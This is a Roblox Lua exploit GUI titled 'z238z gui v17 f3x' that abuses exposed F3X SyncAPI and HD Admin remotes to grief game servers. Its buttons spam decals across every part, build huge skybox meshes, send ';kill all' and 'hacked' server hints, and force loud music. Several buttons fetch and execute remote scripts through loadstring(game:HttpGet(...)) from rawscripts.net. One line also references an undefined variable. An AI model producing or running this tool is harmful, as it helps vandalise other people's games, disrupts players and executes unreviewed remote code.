local player = game.Players.LocalPlayer local screenGui = Instance.new("ScreenGui") screenGui.Name = "f3x" screenGui.ResetOnSpawn = false screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling screenGui.Parent = player:WaitForChild("PlayerGui") local mainFrame = Instance.new("Frame") mainFrame.Size = UDim2.new(0, 400, 0, 538) mainFrame.Position = UDim2.new(0.5, -200, 0.5, -269) mainFrame.BackgroundColor3 = Color3.fromRGB(15, 0, 0) mainFrame.BorderSizePixel = 0 mainFrame.Parent = screenGui local fc = Instance.new("UICorner") fc.CornerRadius = UDim.new(0, 10) fc.Parent = mainFrame local fg = Instance.new("UIGradient") fg.Color = ColorSequence.new{ColorSequenceKeypoint.new(0, Color3.fromRGB(40, 0, 0)), ColorSequenceKeypoint.new(1, Color3.fromRGB(120, 0, 0))} fg.Parent = mainFrame Instance.new("UIDragDetector", mainFrame) local title = Instance.new("TextLabel") title.Size = UDim2.new(1, 0, 0, 50) title.BackgroundTransparency = 1 title.Text = "z238z gui v17 f3x" title.TextColor3 = Color3.fromRGB(255, 0, 0) title.TextScaled = true title.Font = Enum.Font.GothamBlack title.Parent = mainFrame local function makeBtn(name, text, pos, size) local btn = Instance.new("TextButton") btn.Name = name btn.Text = text btn.Size = size btn.Position = pos btn.BackgroundColor3 = Color3.new(1,1,1) btn.BorderSizePixel = 0 btn.TextColor3 = Color3.new(0,0,0) btn.TextScaled = true btn.Font = Enum.Font.GothamBold btn.Parent = mainFrame local c = Instance.new("UICorner") c.CornerRadius = UDim.new(0, 10) c.Parent = btn local g = Instance.new("UIGradient") g.Color = ColorSequence.new{ ColorSequenceKeypoint.new(0, Color3.fromRGB(80, 0, 0)), ColorSequenceKeypoint.new(1, Color3.fromRGB(200, 0, 0)) } g.Parent = white return btn end local btnHint = makeBtn("Hint", "hint", UDim2.new(0, 274, 0, 220), UDim2.new(0, 94, 0, 52)) local btnSky2 = makeBtn("Sky2", "skybox 2", UDim2.new(0, 270, 0, 362), UDim2.new(0, 104, 0, 62)) local btnSlap = makeBtn("realm", "realm 2", UDim2.new(0, 26, 0, 366), UDim2.new(0, 94, 0, 54)) local btnDisco = makeBtn("Disco", "disco", UDim2.new(0, 276, 0, 82), UDim2.new(0, 90, 0, 46)) local btnBtools = makeBtn("Btools", "Btools", UDim2.new(0, 34, 0, 146), UDim2.new(0, 88, 0, 46)) local btnSky3 = makeBtn("Sky3", "skybox 3", UDim2.new(0, 30, 0, 446), UDim2.new(0, 92, 0, 70)) local btnUndisco = makeBtn("Time", "Time", UDim2.new(0, 276, 0, 152), UDim2.new(0, 92, 0, 46)) local btnMeep = makeBtn("realm", "realm", UDim2.new(0, 30, 0, 288), UDim2.new(0, 88, 0, 54)) local btnSky5 = makeBtn("Sky5", "skybox 5", UDim2.new(0, 146, 0, 442), UDim2.new(0, 112, 0, 72)) local btnSky4 = makeBtn("Sky4", "skybox 4", UDim2.new(0, 268, 0, 440), UDim2.new(0, 108, 0, 74)) local btnZ00 = makeBtn("SKY", "SkyBOX f3x", UDim2.new(0, 146, 0, 288), UDim2.new(0, 102, 0, 52)) local btnMsg = makeBtn("Msg", "theme 2", UDim2.new(0, 270, 0, 288), UDim2.new(0, 98, 0, 52)) local btnDecal = makeBtn("Decal", "decal", UDim2.new(0, 146, 0, 82), UDim2.new(0, 98, 0, 44)) local btnAvatar = makeBtn("char", "char all", UDim2.new(0, 148, 0, 222), UDim2.new(0, 98, 0, 50)) local btnR6 = makeBtn("R6", "R6", UDim2.new(0, 30, 0, 78), UDim2.new(0, 88, 0, 46)) local btnMsg2 = makeBtn("Msg2", "message 2", UDim2.new(0, 146, 0, 364), UDim2.new(0, 108, 0, 58)) local btnSky1 = makeBtn("Sky1", "skybox", UDim2.new(0, 30, 0, 220), UDim2.new(0, 90, 0, 54)) local btnTheme = makeBtn("Theme", "theme", UDim2.new(0, 150, 0, 150), UDim2.new(0, 94, 0, 44)) local function getSyncTool() local tool for _, v in pairs(player:GetDescendants()) do if v.Name == "SyncAPI" then tool = v.Parent break end end if not tool then for _, v in pairs(game.ReplicatedStorage:GetDescendants()) do if v.Name == "SyncAPI" then tool = v.Parent break end end end return tool end local function runSync(args) local tool = getSyncTool() if tool and tool.SyncAPI and tool.SyncAPI.ServerEndpoint then tool.SyncAPI.ServerEndpoint:InvokeServer(unpack(args)) end end local function Sky(id) local char = player.Character or player.CharacterAdded:Wait() local root = char:FindFirstChild("HumanoidRootPart") if not root then return end local cf = root.CFrame local pos = CFrame.new(math.floor(cf.X), math.floor(cf.Y), math.floor(cf.Z)) + Vector3.new(0,0,0) runSync({"CreatePart", "Normal", pos, workspace}) task.wait(0) for _, v in pairs(workspace:GetDescendants()) do if v:IsA("BasePart") and math.abs(v.Position.X - pos.X) < 10 and math.abs(v.Position.Z - pos.Z) < 0.01 then runSync({"SetName", {v}, "Skybox"}) runSync({"CreateMeshes", {{["Part"] = v}}}) runSync({"SyncMesh", {{["Part"] = v, ["MeshId"] = "rbxassetid://111891702759441"}}}) runSync({"SyncMesh", {{["Part"] = v, ["TextureId"] = "rbxassetid://"..id}}}) runSync({"SyncMesh", {{["Part"] = v, ["Scale"] = Vector3.new(7200,7200,7200)}}}) runSync({"SetLocked", {v}, true}) end end if game.Lighting:FindFirstChild("Sky") then game.Lighting.Sky:Destroy() end end local function DecalSpam(id) for _, v in pairs(workspace:GetDescendants()) do if v:IsA("BasePart") then task.spawn(function() runSync({"SetLocked", {v}, false}) for _, face in pairs(Enum.NormalId:GetEnumItems()) do runSync({"CreateTextures", {{["Part"] = v, ["Face"] = face, ["TextureType"] = "Decal"}}}) runSync({"SyncTexture", {{["Part"] = v, ["Face"] = face, ["TextureType"] = "Decal", ["Texture"] = "rbxassetid://"..id}}}) end end) end end end local function hdCommand(cmdStr) local rs = game:GetService("ReplicatedStorage") if rs:FindFirstChild("HDAdminHDClient") and rs.HDAdminHDClient.Signals:FindFirstChild("RequestCommandSilent") then rs.HDAdminHDClient.Signals.RequestCommandSilent:InvokeServer(cmdStr) end end btnHint.MouseButton1Click:Connect(function() hdCommand(";serverhint team z238z join today! hacked") end) btnSky1.MouseButton1Click:Connect(function() Sky("84802375481593") end) btnSky2.MouseButton1Click:Connect(function() Sky("106412699914754") end) btnSky3.MouseButton1Click:Connect(function() Sky("124668096806568") end) btnSky4.MouseButton1Click:Connect(function() Sky("136862573295569") end) btnSky5.MouseButton1Click:Connect(function() Sky("123149585508128") end) btnSlap.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-realm-F3x-z238z-89304"))() end) btnMeep.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-z238z-realm-gui-LNicky-98293"))() end) btnZ00.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-skybox-F3X-102338"))() end) btnDisco.MouseButton1Click:Connect(function() hdCommand(";kill all ;disco") end) btnUndisco.MouseButton1Click:Connect(function() hdCommand(";Time 0") end) btnBtools.MouseButton1Click:Connect(function() hdCommand(";btools") end) btnDecal.MouseButton1Click:Connect(function() DecalSpam("106412699914754") end) btnAvatar.MouseButton1Click:Connect(function() hdCommand(""); hdCommand(";Char all z238z") end) btnR6.MouseButton1Click:Connect(function() hdCommand(";r6") end) btnMsg.MouseButton1Click:Connect(function() hdCommand(";music 91475390903970 ;volume inf ;pitch 0.76") end) btnMsg2.MouseButton1Click:Connect(function() hdCommand(";serverMessage team z238z join today!") end) btnTheme.MouseButton1Click:Connect(function() hdCommand(";music 86412047196482"); hdCommand(";volume Inf ;pitch 0.75") end)